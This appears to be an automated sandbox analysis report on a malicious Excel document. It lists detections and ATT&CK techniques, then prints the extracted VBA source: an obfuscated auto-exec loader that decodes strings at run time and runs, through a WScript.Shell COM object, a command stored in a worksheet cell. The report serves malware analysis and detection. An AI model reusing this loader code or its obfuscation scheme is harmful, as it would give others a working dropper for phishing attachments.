Verdict: MALICIOUS
Risk Score: 322

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1027 Obfuscated Files or Information
This Excel file contains heavily obfuscated VBA and XLM macros, including Document_Open and Workbook_Open auto-exec procedures. The VBA code uses a custom decoder function (AHE_AU) to deobfuscate strings at run time; one decoded string is passed to Application.Run to reach a routine that instantiates a COM object via CreateObject and calls its Exec method on a second decoded string read from a worksheet cell (sheet MProp, cell J225), indicating that the document is designed to execute a secondary payload. The combination of auto-exec macros, string obfuscation and a payload stored outside the macro source strongly suggests malicious intent to download and execute further malware.
Heuristics (9)

- ClamAV: Xls.Malware.Valyria-6700358-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7614 bytes |

xlm_macros.txt

SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d

Preview script (first 1,000 lines of the extracted script):

```text
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - MPro
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
```

macros.bas

SHA-256: 08f41f0b4e57eb228e4eef7fd067a2dc1fdf57906f38c447289ee28063a87883

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 8 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function ac2AAVCKA() As String
Dim aac2AAVCKA As String
aac2AAVCKA = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
ac2AAVCKA = aac2AAVCKA
End Function
Public Function AHE_AU(ByVal AP_LHL As String)
Dim UF_E As String
Dim EJO_AQ As Long
For EJO_AQ = 1 To Len(AP_LHL) Step 2
UF_E = UF_E & Chr(CLng("&H" & Mid(AP_LHL, EJO_AQ, 2)) - 4)
Next
AHE_AU = UF_E
End Function
Public Sub Document_Open()
Application.Run AHE_AU("56504C4B5E63565053485151534549")
End Sub
Private Function acD4I64CW() As String
Dim aacD4I64CW As String
aacD4I64CW = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acD4I64CW = aacD4I64CW
End Function
Sub Workbook_Open()
Application.Run "ThisWorkbook." & AHE_AU("56504C4B5E63565053485151534549")
End Sub
Private Function acHF4C4KC() As String
Dim aacHF4C4KC As String
aacHF4C4KC = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acHF4C4KC = aacHF4C4KC
End Function
Public Sub PJB_JJP()
Dim AP_LHL As Object: Set AP_LHL = VBA.CreateObject(AHE_AU("5B5767766D747832576C697070"))
AP_LHL.Exec (AHE_AU(ThisWorkbook.Sheets("MProp").Range("J225").Value))
End Sub
Private Function acRD6CFLI() As String
Dim aacRD6CFLI As String
aacRD6CFLI = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acRD6CFLI = aacRD6CFLI
End Function
Sub RLHGZ_RLODMMOAE()
PJB_JJP
End Sub
' Processing file: /opt/analyzer/scan_staging/e3d7fd8b004b494ea7cab8140a539c42.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8281 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Private Function AP_LHL(id_FFFE As String) As String)
' Line #2:
' Dim
' VarDefn UF_E (As String)
' Line #3:
' LitStr 0x017A "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
' St UF_E
' Line #4:
' Reparse 0x0022 "ac2AAVCKA = aac2AAVCKAEnd Function"
' Line #5:
' Line #6:
' FuncDefn (Public Function Chr(ByVal Document_Open As String, id_FFFE As Variant))
' Line #7:
' Dim
' VarDefn Application (As String)
' Line #8:
' Dim
' VarDefn Run (As L
```

(preview truncated)